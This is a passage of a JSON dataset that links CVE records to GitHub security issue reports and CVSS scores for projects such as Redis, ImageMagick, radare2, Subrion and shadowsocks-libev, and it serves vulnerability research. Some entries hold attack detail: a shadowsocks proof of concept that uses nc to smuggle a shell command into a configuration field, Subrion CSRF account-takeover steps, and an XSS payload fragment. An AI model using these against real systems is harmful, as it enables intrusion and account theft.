        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15041",
        "Issue_Url_old": "https://github.com/golang/go/issues/22125",
        "Issue_Url_new": "https://github.com/golang/go/issues/22125",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2017-10-04T06:06:01Z",
        "description": "placeholder for security issue. Placeholder for security release on October NUMBERTAG Go NUMBERTAG and Go NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15042",
        "Issue_Url_old": "https://github.com/golang/go/issues/22134",
        "Issue_Url_new": "https://github.com/golang/go/issues/22134",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2017-10-04T17:36:00Z",
        "description": "placeholder for security issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-15047",
        "Issue_Url_old": "https://github.com/antirez/redis/issues/4278",
        "Issue_Url_new": "https://github.com/redis/redis/issues/4278",
        "Repo_new": "redis/redis",
        "Issue_Created_At": "2017-08-31T19:06:03Z",
        "description": "Potential Buffer Overflow from user controllable Array Index value. The APITAG function within PATHTAG seems to allow for a Buffer Overflow vulnerability leading from an array index being set from user controllable input. The vulnerable code is: CODETAG As we can see, the _slot_ variable is receiving the output of atoi being run here: APITAG Now, _argv[j]_ is basically the arguments of each line (stored in APITAG being put into the array using _sdssplitargs_ for further processing. The slot value, after being extracted is then used in the _if else_ block which controls the slot migration, i.e. APITAG and APITAG . It is safe to assume that a user won't try to put in invalid slot numbers in the cluster configuration file. However, an attacker with limited access to the machine would be able to trigger memory corruption issues or even potentially execute code by forcing an Array Index out of Bounds exception from happening due to invalid values of _slot_. There should be some validation on the value of _slot_ and the maximum length of the _migrating_slots_to_ and _migrating_slots_from_ arrays.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15056",
        "Issue_Url_old": "https://github.com/upx/upx/issues/128",
        "Issue_Url_new": "https://github.com/upx/upx/issues/128",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2017-10-02T06:31:37Z",
        "description": "Invalid Pointer Read in APITAG An Invalid Pointer Read occur in APITAG while decompressing a crafted binary. ASAN reports: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15063",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/547",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/547",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2017-10-01T07:56:36Z",
        "description": "CSRF Token Bypass because of code logic error.. There are CSRF vulnerabilities At Subrion CMS because of code logic APITAG the check function is set in the program, its location does not appear to be correct in FILETAG . APITAG APITAG should be executed first and then APITAG For example,we can use this vulnerability to get a APITAG create a html page which can simulate the function of the SQL tool. CODETAG When the administrator visit the page, even though it will echo APITAG treated as a potential CSRF APITAG SQL statement has been executed and the webshell has been created.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15063",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/570",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/570",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2017-10-15T03:58:59Z",
        "description": "CSRF Account Take Over Possible. Affected Software Subrion Open Source CMS FILETAG URLTAG Version Tested NUMBERTAG Latest Stable version June NUMBERTAG URLTAG Environment Tested Ubuntu NUMBERTAG PHP NUMBERTAG ulnerability and Impact Vulnerability: Cross Site Request Forgery CSRF attack on profile upload Impact: Account Take Over The changing of password requires the knowledge of the current password, this prevents simplified account take over. It is still possible to perform an account take over through CSRF attack as it is possible to change the email of the user without knowing the current password. By changing the email, the attacker is able to perform a account reset :) Vulnerability Description: It is discovered that state changing requests, such as updating of profile: APITAG contains a parameter __st that holds a unqiue value to act as a CSRF prevention However this value is not validated on the server side and thus it is possible to perform a CSRF attack. Steps to Reproduce: Craft a .html file that contains the CSRF attack POST request. Please change the PATHTAG to your own hosted IP address. The value of fullname does not matter. The important parameter here is email. Please note that for demonstration purpose, clicking on APITAG request\" is required. A real attack does not require a victim to click on any buttons, as it is possible to auto submit POST request when a page is loaded ERRORTAG NUMBERTAG Authenticate into Subrion CMS. Browse to your profile page NUMBERTAG On another tab, visit this crafted .html and click Submit Request NUMBERTAG Refresh your profile page and your email will be hijacked Refer to the screenshot attached. The entire __st is removed and the state changing request to update the profile still works. APITAG Recommendation: Validate the CSRF token Consider implementing changing of email to require the current password URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15095",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1737",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1737",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2017-08-17T21:24:26Z",
        "description": "Block more JDK types from polymorphic deserialization. (note: follow up for NUMBERTAG After initial set of types blocked new reports have arrived for more black listing. Although eventual approach is likely to rely separate module (for more timely updates and wider version coverage), at this point addition in databind is needed. I will update specific list of additions once complete and release is out. Target versions are APITAG and APITAG it is possible to backport in NUMBERTAG and even NUMBERTAG but there is diminishing return on effort with those versions so it will not happen unless specifically requested (I'm happy to merge PRs).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15095",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1680",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1680",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2017-06-27T04:56:59Z",
        "description": "Blacklist couple more types for deserialization. (note: follow up on NUMBERTAG Looks like there is at least one other \"well known\" type to block besides NUMBERTAG already added (an impl class for database drivers). Will gather some more details; if appears credible, will add for NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15133",
        "Issue_Url_old": "https://github.com/miekg/dns/issues/627",
        "Issue_Url_new": "https://github.com/miekg/dns/issues/627",
        "Repo_new": "miekg/dns",
        "Issue_Created_At": "2018-01-17T11:17:11Z",
        "description": "CVETAG . CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15194",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1010",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/1010",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2017-10-04T13:36:16Z",
        "description": "Path Based Cross Site Scripting (XSS) . Running version NUMBERTAG Had a security scan performed on application and found NUMBERTAG instances of XSS: APITAG vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload.In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. APITAG exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. APITAG all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15217",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/759",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/759",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-14T23:41:46Z",
        "description": "memory leak in APITAG Here is the ciritical code ERRORTAG It can be solved by this: ERRORTAG Credit: APITAG of venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15218",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/760",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/760",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-09-15T05:55:48Z",
        "description": "memory leak in APITAG Here is the critical code: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15232",
        "Issue_Url_old": "https://github.com/mozilla/mozjpeg/issues/268",
        "Issue_Url_new": "https://github.com/mozilla/mozjpeg/issues/268",
        "Repo_new": "mozilla/mozjpeg",
        "Issue_Created_At": "2017-09-30T02:36:55Z",
        "description": "NULL Pointer Dereference vulneribility in quantize_ord_dither function of mozjpeg. Command and argument djpeg crop NUMBERTAG onepass dither ordered dct float colors NUMBERTAG targa grayscale outfile o FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15277",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/592",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/592",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-21T04:34:43Z",
        "description": "uninitialized image palette in coders/gif.c. Gif coder leaves the palette uninitialized if neither global nor local palette is present in a gif file. If APITAG is used as a library loaded into a process that operates on interesting data, this can cause security consequences. Repro is available at FILETAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15281",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/832",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/832",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-10-09T14:26:17Z",
        "description": "Conditional Statement depends on uninitialized value. Version NUMBERTAG Running APITAG on a malformed input file results in a jump based on an non initialized variable. The hexdump of the input file is: APITAG The relevant Memory Check output is: ERRORTAG The input file causing triggering the issue is attached: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15364",
        "Issue_Url_old": "https://github.com/evan/ccsv/issues/15",
        "Issue_Url_new": "https://github.com/evan/ccsv/issues/15",
        "Repo_new": "evan/ccsv",
        "Issue_Created_At": "2017-10-12T22:38:57Z",
        "description": "Double free security issue. When attempting to parse a file with the following bytes, a double free occurs. APITAG Tested on ubuntu, with APITAG . gdb debug: CODETAG gdb output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15368",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8673",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8673",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-10-11T08:21:07Z",
        "description": "Stack buffer overflow in APITAG Stack buffer overflow in APITAG Git HEAD: APITAG Faulting file in URLTAG Command: APITAG Valgrind log: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15385",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8685",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8685",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-10-13T19:14:49Z",
        "description": "Invalid write in APITAG Invalid write in APITAG Git HEAD: APITAG Faulting file in URLTAG Command: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15609",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3868",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3868",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2017-10-18T03:35:01Z",
        "description": "Sensitive variables can be written in clear text when using Offline Drop targets. Issue See private issue for more details: URLTAG Sensitive variable value is written to variable file as clear text. Offline drop deployments generate two variable JSON files: one for normal variables which are written in clear text, and one for sensitive variables which is encrypted using the Offline Drop Target's encryption password. If any variable is sensitive, Octopus requires any Offline Drop Target to specify a valid encryption password, and any sensitive values will be encrypted into that file. If your project uses complex nested bindings, the resulting values can be treated as non sensitive and written to the clear text variables file. If an attacker can gain access to these offline drop files, they can gain the sensitive data without needing to decrypt it. Affected versions This affects Octopus APITAG up to APITAG , and is fixed in Octopus APITAG . Implemented solution We now use the configuration of the Offline Drop Target as the switch. If the user has configured an encryption password, they have opted in to have all their variables encrypted, regardless of whether there are any sensitive values or not.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15610",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3869",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3869",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2017-10-18T03:45:14Z",
        "description": "Certificate private keys downloadable when guest user has admin rights. Issue See private issue: URLTAG When the special Guest user account is granted the APITAG permission, and Guest Access is enabled for the Octopus Server, an attacker can sign in as the Guest account and export Certificates managed by Octopus, including the private key. We generally recommend the Guest account is not granted these high level permissions, but want to take the extra step to ensure private keys are never leaked to the Guest user account. Affected Versions Octopus APITAG to APITAG . Fixed in Octopus APITAG . Implemented Solution The special Guest account is specifically denied access to export certificates including the private key, even if the Guest account has been granted the APITAG permission. Fixed in URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15611",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3864",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3864",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2017-10-17T04:06:12Z",
        "description": "Further restrict APITAG action to those with APITAG and APITAG permissions. To further reflect what was the intention of the power of APITAG it will now require additional privileges to be granted. Reasoning By inviting a user to an existing team, the user is editing a team, and causing the creation of a user. This would allow them to invite a user to a team with greater privilege than their own. To make it clear they will now require APITAG which makes it more obvious the power of this action.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-15640",
        "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/1521",
        "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/1521",
        "Repo_new": "phpipam/phpipam",
        "Issue_Created_At": "2017-10-26T08:53:25Z",
        "description": "Cross Site script. payload: /?ip NUMBERTAG EMAILTAG APITAG Utilization method NUMBERTAG the first account password login NUMBERTAG direct copy payload to the domain name back at site Vulnerability location\uff1a Home search box after login Official demo vulnerability replication \uff1a URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-15806",
        "Issue_Url_old": "https://github.com/zetacomponents/Mail/issues/58",
        "Issue_Url_new": "https://github.com/zetacomponents/mail/issues/58",
        "Repo_new": "zetacomponents/Mail",
        "Issue_Created_At": "2017-10-24T00:40:55Z",
        "description": "CVETAG : Critical RCE vulnerability. A critical remote code execution vulnerability has been discovered in current version. Please contact me at k EMAILTAG for more details.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-15871",
        "Issue_Url_old": "https://github.com/commenthol/serialize-to-js/issues/3",
        "Issue_Url_new": "https://github.com/commenthol/serialize-to-js/issues/3",
        "Repo_new": "commenthol/serialize-to-js",
        "Issue_Created_At": "2017-10-23T12:23:27Z",
        "description": "deserialize method is vulnerable. FILETAG Hi, there is a vulnerability in deserialize method, please see APITAG above.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15924",
        "Issue_Url_old": "https://github.com/shadowsocks/shadowsocks-libev/issues/1734",
        "Issue_Url_new": "https://github.com/shadowsocks/shadowsocks-libev/issues/1734",
        "Repo_new": "shadowsocks/shadowsocks-libev",
        "Issue_Created_At": "2017-10-13T15:04:42Z",
        "description": "Command Execution in ss manager. Overview Severity Rating: High Confirmed Affected Versions NUMBERTAG Confirmed Patched Versions: N/A Vendor: Shadowsocks Vendor URL: URLTAG Vector: Local Credit NUMBERTAG D Sec APITAG Niklas Abel Status: Public CVE: not yet assigned Advisory URL: URLTAG Summary and Impact APITAG libev offers local command execution per configuration file or/and additionally, code execution per UDP request on APITAG The configuration file on the file system or the JSON configuration received via UDP request is parsed and the arguments are passed to the \"add_server\" function. The function calls APITAG server);\" which returns a string from the parsed configuration. The string gets executed at line NUMBERTAG if (system(cmd NUMBERTAG so if a configuration parameter contains \"||evil command&&\" within the \"method\" parameter, the evil command will get executed. The ss manager uses UDP port NUMBERTAG to get control commands on APITAG By default no authentication is required, although a password can be set with the ' k' parameter. Product Description Shadowsocks libev is a lightweight secured SOCKS5 proxy for embedded devices and low end boxes. The ss manager is meant to control Shadowsocks servers for multiple users, it spawns new servers if needed. It is a port of Shadowsocks created by MENTIONTAG and maintained by MENTIONTAG and MENTIONTAG Proof of Concept As passed configuration requests are getting executed, the following command will create file \"evil\" in /tmp/ on the server: nc u APITAG NUMBERTAG add: {\"server_port NUMBERTAG password\":\"test\", \"method\":\"||touch /tmp/evil||\"} The code is executed through PATHTAG If the configuration file on the file system is manipulated, the code would get executed as soon as a Shadowsocks instance is started from ss manage, as long as the malicious part of the configuration has not been overwritten. Workarounds There is no workaround available, do not use ss manage until a patch is released. About NUMBERTAG D Sec APITAG NUMBERTAG D Sec is a provider of application security services. We focus on application code reviews, design review and security testing NUMBERTAG D Sec APITAG was founded in NUMBERTAG by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline NUMBERTAG Issues found NUMBERTAG endor contacted NUMBERTAG endor contacted, replied to use APITAG for a full disclosure NUMBERTAG endor contacted, asked if the vendor is sure to want a full disclosure NUMBERTAG endor contacted, replied to create a public issue on APITAG NUMBERTAG Created public issues on APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15928",
        "Issue_Url_old": "https://github.com/ohler55/ox/issues/194",
        "Issue_Url_new": "https://github.com/ohler55/ox/issues/194",
        "Repo_new": "ohler55/ox",
        "Issue_Created_At": "2017-10-27T03:26:47Z",
        "description": "Seg fault parse_obj. POC file: APITAG crash: ERRORTAG gdb backtrace: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-15931",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8731",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8731",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-10-23T12:20:07Z",
        "description": "radare2 invalid memory access in r_endian.h. An invalid memory access issue was found in r_endian.h when handling crafted elf files, which may lead to potential attack. PATHTAG PATHTAG v radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a NUMBERTAG commit: APITAG build NUMBERTAG PATHTAG gdb q PATHTAG Reading symbols from PATHTAG (gdb) r q c ia ./radare2 sigsegv r endian NUMBERTAG poc Starting program: PATHTAG q c ia ./radare2 sigsegv r endian NUMBERTAG poc FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15932",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/8743",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8743",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-10-26T06:09:51Z",
        "description": "radare2 invalid memory access in elf.c. A invalid memory access issue was found in radare2 elf.c on NUMBERTAG bit linux when handling crafted efl file. Build information: CODETAG Backtrace: ERRORTAG My enviroment: ERRORTAG A POC file has been attached to reproduce this issue. FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15953",
        "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/2",
        "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/2",
        "Repo_new": "extramaster/bchunk",
        "Issue_Created_At": "2017-08-31T09:46:50Z",
        "description": "Heap Buffer Overflow on bchunk NUMBERTAG and NUMBERTAG I discovered an instance of heap buffer overflow bug on bchunk NUMBERTAG and NUMBERTAG This issue was discovered and can be replicated on a NUMBERTAG bit Ubuntu machine, for instance I discovered the issue on APITAG The following is some stack trace information, please kindly advise how and where can I share the full output with more details and also the POC files to replicate the issue: ERRORTAG I have emailed the author a few days ago but I don't think he still maintain the code, since NUMBERTAG was published in NUMBERTAG However, this project's NUMBERTAG was published in NUMBERTAG so I believe that this is still maintained. This seems to be the only active upstream for bchunk. If this is not the right place to report the issue, please kindly point me to the right direction, thanks a lot!",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15953",
        "Issue_Url_old": "https://github.com/hessu/bchunk/issues/1",
        "Issue_Url_new": "https://github.com/hessu/bchunk/issues/1",
        "Repo_new": "hessu/bchunk",
        "Issue_Created_At": "2017-11-13T23:41:33Z",
        "description": "CVETAG : heap based buffer overflow and crash when processing a malformed CUE file.. bchunk NUMBERTAG is vulnerable to a heap based buffer overflow and crash when processing a malformed CUE file. Fix committed in APITAG provided by Yegor Timoshenko. Fixed in version NUMBERTAG CVETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15954",
        "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/3",
        "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/3",
        "Repo_new": "extramaster/bchunk",
        "Issue_Created_At": "2017-09-09T10:54:33Z",
        "description": "Another Heap Buffer Overflow on bchunk NUMBERTAG and NUMBERTAG This issue is a heap related error similar to URLTAG url but when replicated using gdb exploitable, it has a hash value that is different. There were NUMBERTAG different payloads that produces the same hash value as URLTAG url but only NUMBERTAG other payload produces the following hash value, which makes it evident that this heap related error is caused by a different part of the code NUMBERTAG APITAG ERRORTAG NUMBERTAG APITAG ERRORTAG The following is the stack trace output from gdb: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15955",
        "Issue_Url_old": "https://github.com/extramaster/bchunk/issues/4",
        "Issue_Url_new": "https://github.com/extramaster/bchunk/issues/4",
        "Repo_new": "extramaster/bchunk",
        "Issue_Created_At": "2017-09-09T11:08:37Z",
        "description": "Access violation near NULL on destination operand. I have discovered several malformed cue files that would cause bchunk to run into segmentation fault. With the help of gdb exploitable, it can be determined that there was an access violation near NULL on the destination operand. The following is a full output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-15955",
        "Issue_Url_old": "https://github.com/hessu/bchunk/issues/2",
        "Issue_Url_new": "https://github.com/hessu/bchunk/issues/2",
        "Repo_new": "hessu/bchunk",
        "Issue_Created_At": "2017-11-13T23:48:47Z",
        "description": "CVETAG : Access violation near NULL on destination operand and crash when processing a malformed CUE file. bchunk NUMBERTAG dies with access violation near NULL on destination operand when processing a malformed CUE file. Fix committed in APITAG provided by Yegor Timoshenko. Fixed in version NUMBERTAG CVETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-16006",
        "Issue_Url_old": "https://github.com/jonschlinkert/remarkable/issues/227",
        "Issue_Url_new": "https://github.com/jonschlinkert/remarkable/issues/227",
        "Repo_new": "jonschlinkert/remarkable",
        "Issue_Created_At": "2016-08-20T17:23:28Z",
        "description": "security hole with data: URLs. If you render the markdown xss APITAG APITAG using remarkable in Firefox, clicking it will run a script on the domain of the page displaying the rendered markup (test on URLTAG which can be a security issue. Do you think we could change the protocol blacklist to instead be a whitelist and only include some of the most common protocols? I realize it's already customizable by overriding APITAG but a more secure default would be nice. If that's too big of a change, \"data:\" should at least be filtered out in addition to javascript: and vbscript:.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
